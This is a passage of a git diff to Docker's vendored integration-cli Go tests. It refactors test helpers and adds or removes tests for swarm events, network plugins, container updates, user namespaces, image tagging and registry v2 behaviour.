"-f type=node", "node update "+d3ID, defaultRetryCount) + + t3 := daemonUnixTime(c) + out, err = d1.Cmd("node", "rm", "-f", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filter by scope + waitForEvent(c, d1, t3, "-f scope=swarm", "node remove "+d3ID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a network + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + + waitForEvent(c, d, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + + // remove network + t1 := daemonUnixTime(c) + out, err = d.Cmd("network", "rm", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filtered by network + waitForEvent(c, d, t1, "-f type=network", "network remove "+networkID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsSecret(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + waitForEvent(c, d, "0", "-f scope=swarm", "secret create "+id, defaultRetryCount) + + t1 := daemonUnixTime(c) + d.DeleteSecret(c, id) + // filtered by secret + waitForEvent(c, d, t1, "-f type=secret", "secret remove "+id, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsConfig(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + waitForEvent(c, d, "0", "-f scope=swarm", "config create "+id, 
defaultRetryCount) + + t1 := daemonUnixTime(c) + d.DeleteConfig(c, id) + // filtered by config + waitForEvent(c, d, t1, "-f type=config", "config remove "+id, defaultRetryCount) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go index d9e56ce6df..3b890bcc69 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go @@ -5,20 +5,21 @@ package main import ( "encoding/json" "strings" + "time" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // Make sure task stays pending before plugin is available - waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceTasksInStateWithError("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) plugin := newVolumePlugin(c, "customvolumedriver") defer plugin.Close() @@ -31,7 +32,7 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { // this long delay. // make sure task has been deployed. 
- waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -50,3 +51,54 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { c.Assert(mounts[0].Name, checker.Equals, "my-volume") c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver") } + +// Test network plugin filter in swarm +func (s *DockerSwarmSuite) TestSwarmNetworkPluginV2(c *check.C) { + testRequires(c, IsAmd64) + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + // install plugin on d1 and d2 + pluginName := "aragunathan/global-net-plugin:latest" + + _, err := d1.Cmd("plugin", "install", pluginName, "--grant-all-permissions") + c.Assert(err, checker.IsNil) + + _, err = d2.Cmd("plugin", "install", pluginName, "--grant-all-permissions") + c.Assert(err, checker.IsNil) + + // create network + networkName := "globalnet" + _, err = d1.Cmd("network", "create", "--driver", pluginName, networkName) + c.Assert(err, checker.IsNil) + + // create a global service to ensure that both nodes will have an instance + serviceName := "my-service" + _, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, "busybox", "top") + c.Assert(err, checker.IsNil) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 2) + + // remove service + _, err = d1.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil) + + // wait to ensure all containers have exited before removing the plugin. Else there's a + // possibility of container exits erroring out due to plugins being unavailable. 
+ waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 0) + + // disable plugin on worker + _, err = d2.Cmd("plugin", "disable", "-f", pluginName) + c.Assert(err, checker.IsNil) + + time.Sleep(20 * time.Second) + + image := "busybox:latest" + // create a new global service again. + _, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, image, "top") + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image: 1}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go deleted file mode 100644 index b7d2b1dfe6..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go +++ /dev/null @@ -1,225 +0,0 @@ -package main - -import ( - "fmt" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/go-check/check" -) - -// tagging a named image in a new unprefixed repo should work -func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) { - // Don't attempt to pull on Windows as not in hub. 
It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz") -} - -// tagging an image by ID in a new unprefixed repo should work -func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) { - imageID := inspectField(c, "busybox", "Id") - dockerCmd(c, "tag", imageID, "testfoobarbaz") -} - -// ensure we don't allow the use of invalid repository names; these tag operations should fail -func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) { - invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} - - for _, repo := range invalidRepos { - out, _, err := dockerCmdWithError("tag", "busybox", repo) - c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out)) - } -} - -// ensure we don't allow the use of invalid tags; these tag operations should fail -func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) { - longTag := stringutils.GenerateRandomAlphaOnlyString(121) - - invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} - - for _, repotag := range invalidTags { - out, _, err := dockerCmdWithError("tag", "busybox", repotag) - c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out)) - } -} - -// ensure we allow the use of valid tags -func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) { - // Don't attempt to pull on Windows as not in hub. 
It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} - - for _, repo := range validRepos { - _, _, err := dockerCmdWithError("tag", "busybox:latest", repo) - if err != nil { - c.Errorf("tag busybox %v should have worked: %s", repo, err) - continue - } - deleteImages(repo) - } -} - -// tag an image with an existed tag name without -f option should work -func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - dockerCmd(c, "tag", "busybox:latest", "busybox:test") -} - -func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) { - // Don't attempt to pull on Windows as not in hub. 
It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - // test repository name begin with '-' - out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) - - // test namespace name begin with '-' - out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) - - // test index name begin with '-' - out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) -} - -// ensure tagging using official names works -// ensure all tags result in the same name -func (s *DockerSuite) TestTagOfficialNames(c *check.C) { - names := []string{ - "docker.io/busybox", - "index.docker.io/busybox", - "library/busybox", - "docker.io/library/busybox", - "index.docker.io/library/busybox", - } - - for _, name := range names { - out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest") - if err != nil || exitCode != 0 { - c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out) - continue - } - - // ensure we don't have multiple tag names. 
- out, _, err = dockerCmdWithError("images") - if err != nil { - c.Errorf("listing images failed with errors: %v, %s", err, out) - } else if strings.Contains(out, name) { - c.Errorf("images should not have listed '%s'", name) - deleteImages(name + ":latest") - } - } - - for _, name := range names { - _, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest") - if err != nil || exitCode != 0 { - c.Errorf("tag %v fooo/bar should have worked: %s", name, err) - continue - } - deleteImages("fooo/bar:latest") - } -} - -// ensure tags can not match digests -func (s *DockerSuite) TestTagMatchesDigest(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" - // test setting tag fails - _, _, err := dockerCmdWithError("tag", "busybox:latest", digest) - if err == nil { - c.Fatal("digest tag a name should have failed") - } - // check that no new image matches the digest - _, _, err = dockerCmdWithError("inspect", digest) - if err == nil { - c.Fatal("inspecting by digest should have failed") - } -} - -func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) { - // Don't attempt to pull on Windows as not in hub. 
It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - // test setting tag fails - _, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag") - if err == nil { - c.Fatal("tagging with image named \"sha256\" should have failed") - } -} - -// ensure tags cannot create ambiguity with image ids -func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) { - //testRequires(c, DaemonIsLinux) - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - imageID, err := buildImage("notbusybox:latest", - `FROM busybox - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } - truncatedImageID := stringid.TruncateID(imageID) - truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID) - - id := inspectField(c, truncatedTag, "Id") - - // Ensure inspect by image id returns image for image id - c.Assert(id, checker.Equals, imageID) - c.Logf("Built image: %s", imageID) - - // test setting tag fails - _, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag) - if err != nil { - c.Fatalf("Error tagging with an image id: %s", err) - } - - id = inspectField(c, truncatedTag, "Id") - - // Ensure id is imageID and not busybox:latest - c.Assert(id, checker.Not(checker.Equals), imageID) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go index caae29024a..50744b0111 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go @@ -3,28 +3,28 @@ package main import ( "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestTopMultipleArgs(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) var expected icmd.Expected - switch daemonPlatform { + switch testEnv.OSType { case "windows": expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"} default: expected = icmd.Expected{Out: "PID"} } result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid") - c.Assert(result, icmd.Matches, expected) + result.Assert(c, expected) } func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) out1, _ := dockerCmd(c, "top", cleanedContainerID) @@ -34,7 +34,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { // Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters. // Linux will display the command executed in the container var lookingFor string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { lookingFor = "busybox.exe" } else { lookingFor = "top" @@ -49,7 +49,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { // very different to Linux in this regard. 
func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) { testRequires(c, DaemonIsWindows) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) out1, _ := dockerCmd(c, "top", cleanedContainerID) lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go deleted file mode 100644 index 0b31bb45ff..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go +++ /dev/null @@ -1,41 +0,0 @@ -package main - -import ( - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false") - timeout := 60 * time.Second - if daemonPlatform == "windows" { - timeout = 180 * time.Second - } - - id := strings.TrimSpace(string(out)) - - // update restart policy to on-failure:5 - dockerCmd(c, "update", "--restart=on-failure:5", id) - - err := waitExited(id, timeout) - c.Assert(err, checker.IsNil) - - count := inspectField(c, id, "RestartCount") - c.Assert(count, checker.Equals, "5") - - maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") - c.Assert(maximumRetryCount, checker.Equals, "5") -} - -func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) { - out, _ := runSleepingContainer(c, "--rm") - id := strings.TrimSpace(out) - - // update restart policy for an AutoRemove container - out, _, err := dockerCmdWithError("update", "--restart=always", id) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container") -} diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go index 580ff02602..564c50f32f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go @@ -3,17 +3,20 @@ package main import ( + "context" "encoding/json" "fmt" - "github.com/kr/pty" "os/exec" "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/parsers/kernel" "github.com/go-check/check" + "github.com/kr/pty" ) func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) { @@ -136,7 +139,7 @@ func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) { func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { testRequires(c, DaemonIsLinux, kernelMemorySupport) - isNewKernel := kernel.CheckKernelVersion(4, 6, 0) + isNewKernel := CheckKernelVersion(4, 6, 0) name := "test-update-container" dockerCmd(c, "run", "-d", "--name", name, "busybox", "top") _, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name) @@ -168,6 +171,18 @@ func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") } +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() *kernel.VersionInfo { + v, _ := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion) + return v +} + +// CheckKernelVersion checks if current kernel is newer than (or equal to) +// the given version. 
+func CheckKernelVersion(k, major, minor int) bool { + return kernel.CompareKernelVersion(*GetKernelVersion(), kernel.VersionInfo{Kernel: k, Major: major, Minor: minor}) >= 0 +} + func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) { testRequires(c, DaemonIsLinux) testRequires(c, memoryLimitSupport) @@ -219,7 +234,7 @@ func (s *DockerSuite) TestUpdateStats(c *check.C) { c.Assert(waitRun(name), checker.IsNil) getMemLimit := func(id string) uint64 { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") @@ -281,3 +296,44 @@ func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(waitRun(id), checker.IsNil) } + +func (s *DockerSuite) TestUpdateWithNanoCPUs(c *check.C) { + testRequires(c, cpuCfsQuota, cpuCfsPeriod) + + file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + + out, _ := dockerCmd(c, "run", "-d", "--cpus", "0.5", "--name", "top", "busybox", "top") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") + + clt, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + inspect, err := clt.ContainerInspect(context.Background(), "top") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000)) + + out = inspectField(c, "top", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "top", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _, err = 
dockerCmdWithError("update", "--cpu-quota", "80000", "top") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set") + + out, _ = dockerCmd(c, "update", "--cpus", "0.8", "top") + inspect, err = clt.ContainerInspect(context.Background(), "top") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(800000000)) + + out = inspectField(c, "top", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "top", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "80000\n100000") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go index acf74238b2..54cfdd179c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go @@ -12,7 +12,7 @@ import ( "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/system" "github.com/go-check/check" @@ -24,7 +24,7 @@ import ( func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel) - c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil) + s.d.StartWithBusybox(c, "--userns-remap", "default") tmpDir, err := ioutil.TempDir("", "userns") c.Assert(err, checker.IsNil) @@ -36,8 +36,8 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { defer 
os.RemoveAll(tmpDirNotExists) // we need to find the uid and gid of the remapped root from the daemon's root dir info - uidgid := strings.Split(filepath.Base(s.d.root), ".") - c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root))) + uidgid := strings.Split(filepath.Base(s.d.Root), ".") + c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.Root))) uid, err := strconv.Atoi(uidgid[0]) c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid")) gid, err := strconv.Atoi(uidgid[1]) @@ -61,15 +61,15 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("Could not inspect running container: out: %q", pid)) // check the uid and gid maps for the PID to ensure root is remapped // (cmd = cat /proc//uid_map | grep -E '0\s+9999\s+1') - out, rc1, err := runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"), exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid))) - c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out)) + c.Assert(err, check.IsNil) - out, rc2, err := runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"), exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid))) - c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out)) + c.Assert(err, check.IsNil) // check that the touched file is owned by remapped uid:gid stat, err := system.Stat(filepath.Join(tmpDir, "testfile")) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go index 889936a062..df0c01a517 100644 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go @@ -6,120 +6,53 @@ import ( "net/http" "os" + "github.com/docker/docker/internal/test/registry" "github.com/go-check/check" ) -func makefile(contents string) (string, func(), error) { - cleanup := func() { - - } - - f, err := ioutil.TempFile(".", "tmp") +func makefile(path string, contents string) (string, error) { + f, err := ioutil.TempFile(path, "tmp") if err != nil { - return "", cleanup, err + return "", err } err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm) if err != nil { - return "", cleanup, err - } - - cleanup = func() { - err := os.Remove(f.Name()) - if err != nil { - fmt.Println("Error removing tmpfile") - } + return "", err } - return f.Name(), cleanup, nil - + return f.Name(), nil } -// TestV2Only ensures that a daemon in v2-only mode does not +// TestV2Only ensures that a daemon does not // attempt to contact any v1 registry endpoints. 
func (s *DockerRegistrySuite) TestV2Only(c *check.C) { - reg, err := newTestRegistry(c) + reg, err := registry.NewMock(c) + defer reg.Close() c.Assert(err, check.IsNil) - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(404) }) - reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { + reg.RegisterHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { c.Fatal("V1 registry contacted") }) - repoName := fmt.Sprintf("%s/busybox", reg.hostport) - - err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true") - c.Assert(err, check.IsNil) + repoName := fmt.Sprintf("%s/busybox", reg.URL()) - dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) - c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup() + s.d.Start(c, "--insecure-registry", reg.URL()) - s.d.Cmd("build", "--file", dockerfileName, ".") - - s.d.Cmd("run", repoName) - s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport) - s.d.Cmd("tag", "busybox", repoName) - s.d.Cmd("push", repoName) - s.d.Cmd("pull", repoName) -} - -// TestV1 starts a daemon in 'normal' mode -// and ensure v1 endpoints are hit for the following operations: -// login, push, pull, build & run -func (s *DockerRegistrySuite) TestV1(c *check.C) { - reg, err := newTestRegistry(c) + tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, check.IsNil) + defer os.RemoveAll(tmp) - v2Pings := 0 - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { - v2Pings++ - // V2 ping 404 causes fallback to v1 - w.WriteHeader(404) - }) - - v1Pings := 0 - reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) { - v1Pings++ - }) - - v1Logins := 0 - reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) 
{ - v1Logins++ - }) - - v1Repo := 0 - reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) { - v1Repo++ - }) - - reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) { - v1Repo++ - }) - - err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false") - c.Assert(err, check.IsNil) - - dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + dockerfileName, err := makefile(tmp, fmt.Sprintf("FROM %s/busybox", reg.URL())) c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup() - s.d.Cmd("build", "--file", dockerfileName, ".") - c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build")) + s.d.Cmd("build", "--file", dockerfileName, tmp) - repoName := fmt.Sprintf("%s/busybox", reg.hostport) s.d.Cmd("run", repoName) - c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run")) - - s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport) - c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt")) - + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL()) s.d.Cmd("tag", "busybox", repoName) s.d.Cmd("push", repoName) - - c.Assert(v1Repo, check.Equals, 2) - s.d.Cmd("pull", repoName) - c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull")) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go deleted file mode 100644 index 7672beb732..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go +++ /dev/null @@ -1,58 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// ensure docker version works -func (s *DockerSuite) 
